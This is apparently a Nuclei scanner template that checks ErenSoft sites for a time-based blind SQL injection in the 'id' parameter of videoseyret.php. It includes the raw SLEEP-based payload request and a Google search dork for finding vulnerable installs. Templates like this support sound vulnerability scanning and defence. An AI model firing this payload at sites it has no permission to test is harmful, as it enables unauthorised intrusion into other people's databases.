id: erensoft-sqli

info:
  name: ErenSoft - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
  reference:
    - https://cxsecurity.com/issue/WLB-2023070055
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"Kodlama:Erensoft"
  tags: sqli,unauth,erensoft

http:
  - raw:
      - |
        GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html") && contains(body, "videoseyret")'
        condition: and

# digest: 4b0a00483046022100deb120c3c842006e5c080d9bb63c8b20698646202cfcb924803d0bffe1d64c00022100fc4dab90103a3bfd439cfda4f83e8555d2c8be9b42fb4489af40df23096e7579:922c64590222798bb761d5b6d8e72950
